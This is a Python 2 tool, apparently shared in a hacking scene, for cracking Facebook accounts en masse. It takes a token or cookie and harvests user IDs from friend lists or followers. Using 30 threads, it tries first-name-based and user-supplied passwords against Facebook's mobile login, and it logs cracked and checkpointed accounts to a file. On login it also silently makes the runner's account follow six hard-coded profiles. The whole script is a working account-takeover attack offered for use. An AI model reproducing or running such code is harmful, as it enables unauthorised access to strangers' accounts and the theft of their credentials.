#!/usr/bin/python
# -*- coding: utf-8
# Recode By  : Najar Ganteng
# Whatsapp : 087804070218

import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, mechanize, uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]')]
try:
    import requests
except ImportError:
    os.system('pip2 install requests')

try:
    import mechanize
except ImportError:
    os.system('pip2 install mechanize')

def keluar():
    print '   THANKS FOR USING MY TOOLS'
    os.sys.exit()


def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.05)


def banner():
    os.system('echo -e " ╔═══════════════════════════════════════════════════╗\n ║ RECODE BY NAJAR GANTENG                           ║ \n ║ FACEBOOK : https://www.facebook.com/345679uS      ║ \n ║ GITHUB : https://github.com/N4J4R                 ║ \n ╚═══════════════════════════════════════════════════╝ \n " | lolcat')


idmem = []
idfriend = []
idfromfriend = []
back = 0
cekrek = []
threads = []
berhasil = []
emteman = []
emfromfriend = []
cekpoint = []
checkpoint = []
oks = []
id = []
auto_total = []
auto_ok = []
auto_cp = []
auto_run = []
listgrup = []
cekrek = []
vulnot = '\x1b[31m   Not Vuln'
vuln = '\x1b[32m   Vuln'

def masuk():
    os.system('clear')
    banner()
    print '\x1b[1;96m [CHOOSE LOGIN METHODE]'
    print '\x1b[1;97m [\x1b[1;92m1\x1b[1;97m]\x1b[1;92m LOGIN WITH TOKEN'
    print '\x1b[1;97m [\x1b[1;92m2\x1b[1;97m]\x1b[1;92m LOGIN WITH COOKIE'
    print '\x1b[1;97m [\x1b[1;92m3\x1b[1;97m]\x1b[1;92m UPDATE SCRIPT'
    print '\x1b[1;97m [\x1b[1;91m0\x1b[1;97m]\x1b[1;91m EXIT'
    pilih_masuk()


def pilih_masuk():
    sek = raw_input('\n\x1b[1;93m [\xe2\x80\xa2] Choose : ')
    if sek == '':
        print '   [!] Fill In The Correct'
        masuk()
    elif sek == '1':
        tokenz()
    elif sek == '2':
        cookie()
    elif sek == '3':
        updatesc()
    elif sek == '0':
        keluar()
    else:
        print '   [!] Fill In The Correct'
        masuk()


def tokenz():
    os.system('clear')
    banner()
    toket = raw_input('\n \x1b[1;93m {+} Token : ')
    try:
        otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
        a = json.loads(otw.text)
        nama = a['name']
        zedd = open('login.txt', 'w')
        zedd.write(toket)
        zedd.close()
        print '\n   [\xe2\x80\xa2] Login Successful √'
        bot_follow()
    except KeyError:
        print '   [!] Token Invalid'
        os.system('clear')
        masuk()


def cookie():
    os.system('clear')
    banner()
    try:
        cookie = raw_input('\n   [\xe2\x80\xa2] Cookie : ')
        data = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36', 
           'referer': 'https://m.facebook.com/', 
           'host': 'm.facebook.com', 
           'origin': 'https://m.facebook.com', 
           'upgrade-insecure-requests': '1', 
           'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 
           'cache-control': 'max-age=0', 
           'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 
           'content-type': 'text/html; charset=utf-8', 
           'cookie': cookie}
        coki = requests.get('https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_', headers=data)
        cari = re.search('(EAAA\\w+)', coki.text)
        hasil = cari.group(1)
        zedd = open('login.txt', 'w')
        zedd.write(hasil)
        zedd.close()
        print '\n   [\xe2\x80\xa2] Login Successful'
        bot_follow()
    except AttributeError:
        print '   [!] Cookie Invalid'
        masuk()
    except UnboundLocalError:
        print '   [!] Cookie Invalid'
        masuk()
    except requests.exceptions.SSLError:
        os.system('clear')
        print '   [!] No Connection'
        keluar()


def bot_follow():
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m [!] Token invalid'
        masuk()

    requests.post('https://graph.facebook.com/100030982954736/subscribers?access_token=' + toket)
    requests.post('https://graph.facebook.com/100013656619316/subscribers?access_token=' + toket)
    requests.post('https://graph.facebook.com/100048656222660/subscribers?access_token=' + toket)
    requests.post('https://graph.facebook.com/100017096688724/subscribers?access_token=' + toket)
    requests.post('https://graph.facebook.com/100015812672190/subscribers?access_token=' + toket)
    requests.post('https://graph.facebook.com/100015775663746/subscribers?access_token=' + toket)
    menu()


def menu():
    global toket
    os.system('clear')
    try:
        toket = open('login.txt', 'r').read()
    except IOError:
        print '\x1b[1;91m [!] Token Invalid'
        os.system('clear')
        os.system('rm -rf login.txt')
        masuk()

    try:
        otw = requests.get('https://graph.facebook.com/me/?access_token=' + toket)
        a = json.loads(otw.text)
        nama = a['name']
        id = a['id']
        ttl = a['birthday']
    except KeyError:
        os.system('clear')
        print '   [!] Token Invalid'
        os.system('rm -rf login.txt')
        masuk()
    except requests.exceptions.ConnectionError:
        print '\x1b[1;91m [!] No Connection'
        keluar()

    passchoice()


def passchoice():
    os.system('clear')
    banner()
    print '\x1b[1;96m [ CHOOSE TARGET ]'
    print '\x1b[1;96m [1] CRACK FROM FRIENDLIST'
    print '\x1b[1;96m [2] CRACK FROM PUBLIC'
    print '\x1b[1;96m [3] CRACK FROM FOLLOWERS'
    print '\x1b[1;91m [0] LOG OUT'
    pilih_passxd()


def pilih_passxd():
    global cekpoint
    global oks
    peak = raw_input('\n \x1b[1;96m{+} Choose : ')
    if peak == '':
        print ' [!] Fill In The Correct'
        pilih_passxd()
    elif peak == '1' or peak == '01':
        os.system('clear')
        banner()
        r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
        z = json.loads(r.text)
        for s in z['data']:
            id.append(s['id'])

    elif peak == '2' or peak == '02':
        os.system('clear')
        banner()
        idt = raw_input('\x1b[1;93m[\xe2\x80\xa2] User ID Target : ')
        try:
            pok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
            sp = json.loads(pok.text)
            print'\x1b[1;93m[\xe2\x80\xa2] Name           : ' + sp['name']
        except KeyError:
            print '\x1b[1;91m [!] Wrong ID Target'
            raw_input('\n   [ Back ]')
            menu()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m [!] No Connection'
            keluar()

        r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
        z = json.loads(r.text)
        for i in z['data']:
            id.append(i['id'])

    elif peak == '3' or peak == '03':
        os.system('clear')
        banner()
        idt = raw_input('\n \x1b[1;93m{+} Followers ID Target : ')
        try:
            pok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
            sp = json.loads(pok.text)
            print '   [\xe2\x80\xa2] Name           : ' + sp['name']
        except KeyError:
            print '\x1b[1;91m [!] Wrong ID Target'
            raw_input('\n   [ Back ]')
            menu()
        except requests.exceptions.ConnectionError:
            print '\x1b[1;91m [!] No Connection'
            keluar()

        r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?limit=999999&access_token=' + toket)
        z = json.loads(r.text)
        for a in z['data']:
            id.append(a['id'])

    elif peak == '0' or peak == '00':
        os.system('rm -rf login.txt')
        keluar()
    else:
        print '\x1b[1;91m [!] Fill In The Correct'
        passchoice()
    print  '\x1b[1;96m  [\xe2\x80\xa2] Total ID       : ' + str(len(id))
    pass4 = raw_input('  \x1b[1;96m[\xe2\x80\xa2] Password 1     : ')
    pass5 = raw_input('  \x1b[1;96m[\xe2\x80\xa2] Password 2     : ')
    pass6 = raw_input('  \x1b[1;96m[\xe2\x80\xa2] Password 3     : ')
    pass7 = raw_input('  \x1b[1;96m[\xe2\x80\xa2] Password 4     : ')
    pass8 = raw_input('  \x1b[1;96m[\xe2\x80\xa2] Password 5     : ')
    print '\n   [\xe2\x80\xa2] CRACK STARTED...\n'

    def main(arg):
        user = arg
        try:
            os.mkdir('done')
        except OSError:
            pass

        try:
            a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
            b = json.loads(a.text)
            tl = b['birthday']
            pass1 = b['first_name'].lower() + '123'
            rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass1, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
            xo = rex.content
            if 'mbasic_logout_button' in xo or 'save-device' in xo:
                print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass1 + ' \xe2\x80\xa2 ' + tl
                oke = open('done/Indo.txt', 'a')
                oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass1)
                oke.close()
                oks.append(user + pass1)
            elif 'checkpoint' in xo:
                print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass1 + ' \xe2\x80\xa2 ' + tl
                cek = open('done/Indo.txt', 'a')
                cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass1)
                cek.close()
                cekpoint.append(user + pass1)
            else:
                pass2 = b['first_name'].lower() + '12345'
                rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass2, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                xo = rex.content
                if 'mbasic_logout_button' in xo or 'save-device' in xo:
                    print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass2 + ' \xe2\x80\xa2 ' + tl
                    oke = open('done/Indo.txt', 'a')
                    oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass2)
                    oke.close()
                    oks.append(user + pass2)
                elif 'checkpoint' in xo:
                    print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass2 + ' \xe2\x80\xa2 ' + tl
                    cek = open('done/Indo.txt', 'a')
                    cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass2)
                    cek.close()
                    cekpoint.append(user + pass2)
                else:
                    pass3 = b['first_name'].lower()
                    rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass3, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                    xo = rex.content
                    if 'mbasic_logout_button' in xo or 'save-device' in xo:
                        print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass3 + ' \xe2\x80\xa2 ' + tl
                        oke = open('done/Indo.txt', 'a')
                        oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass3)
                        oke.close()
                        oks.append(user + pass3)
                    elif 'checkpoint' in xo:
                        print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass3 + ' \xe2\x80\xa2 ' + tl
                        cek = open('done/Indo.txt', 'a')
                        cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass3)
                        cek.close()
                        cekpoint.append(user + pass3)
                    else:
                        rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass4, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                        xo = rex.content
                        if 'mbasic_logout_button' in xo or 'save-device' in xo:
                            print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass4 + ' \xe2\x80\xa2 ' + tl
                            oke = open('done/Indo.txt', 'a')
                            oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass4)
                            oke.close()
                            oks.append(user + pass4)
                        elif 'checkpoint' in xo:
                            print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass4 + ' \xe2\x80\xa2 ' + tl
                            cek = open('done/Indo.txt', 'a')
                            cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass4)
                            cek.close()
                            cekpoint.append(user + pass4)
                        else:
                            rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass5, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                            xo = rex.content
                            if 'mbasic_logout_button' in xo or 'save-device' in xo:
                                print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass5 + ' \xe2\x80\xa2 ' + tl
                                oke = open('done/Indo.txt', 'a')
                                oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass5)
                                oke.close()
                                oks.append(user + pass5)
                            elif 'checkpoint' in xo:
                                print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass5 + ' \xe2\x80\xa2 ' + tl
                                cek = open('done/Indo.txt', 'a')
                                cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass5)
                                cek.close()
                                cekpoint.append(user + pass5)
                            else:
                                rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass6, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                                xo = rex.content
                                if 'mbasic_logout_button' in xo or 'save-device' in xo:
                                    print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass6 + ' \xe2\x80\xa2 ' + tl
                                    oke = open('done/Indo.txt', 'a')
                                    oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass6)
                                    oke.close()
                                    oks.append(user + pass6)
                                elif 'checkpoint' in xo:
                                    print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass6 + ' \xe2\x80\xa2 ' + tl
                                    cek = open('done/Indo.txt', 'a')
                                    cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass6)
                                    cek.close()
                                    cekpoint.append(user + pass6)
                                else:
                                    rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass7, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                                    xo = rex.content
                                    if 'mbasic_logout_button' in xo or 'save-device' in xo:
                                        print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass7 + ' \xe2\x80\xa2 ' + tl
                                        oke = open('done/Indo.txt', 'a')
                                        oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass7)
                                        oke.close()
                                        oks.append(user + pass7)
                                    elif 'checkpoint' in xo:
                                        print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass7 + ' \xe2\x80\xa2 ' + tl
                                        cek = open('done/Indo.txt', 'a')
                                        cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass7)
                                        cek.close()
                                        cekpoint.append(user + pass7)
                                    else:
                                        rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': user, 'pass': pass8, 'login': 'submit'}, headers={'user-agent': 'Mozilla/5.0 (Linux; Android 8.1.0; CPH1909) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/240.0.0.9.115;]'})
                                        xo = rex.content
                                        if 'mbasic_logout_button' in xo or 'save-device' in xo:
                                            print '\x1b[0;32m   [OK] ' + user + ' \xe2\x80\xa2 ' + pass8 + ' \xe2\x80\xa2 ' + tl
                                            oke = open('done/Indo.txt', 'a')
                                            oke.write('\n[OK] ' + user + ' \xe2\x80\xa2 ' + pass8)
                                            oke.close()
                                            oks.append(user + pass8)
                                        elif 'checkpoint' in xo:
                                            print '\x1b[0;33m   [CP] ' + user + ' \xe2\x80\xa2 ' + pass8 + ' \xe2\x80\xa2 ' + tl
                                            cek = open('done/Indo.txt', 'a')
                                            cek.write('\n[CP] ' + user + ' \xe2\x80\xa2 ' + pass8)
                                            cek.close()
                                            cekpoint.append(user + pass8)
        except:
            pass

    p = ThreadPool(30)
    p.map(main, id)
    print '\n\x1b[0;37m   [\xe2\x80\xa2] Crack Finished'
    print '   [\xe2\x80\xa2] Total OK/CP: ' + str(len(oks)) + '/' + str(len(cekpoint))
    print '   [\xe2\x80\xa2] File Saved At : done/Indo.txt'
    raw_input('   [ Back ]')
    os.system('python2 nbf')
    menu()


def updatesc():
    os.system('clear')
    banner()
    jalan('\n   [\xe2\x80\xa2] Updating Script...')
    os.system('git pull origin master')
    print '   [\xe2\x80\xa2] Successfully Update'
    raw_input('\n   [ Back ]')
    os.system('python2 nbf')


if __name__ == '__main__':
    menu()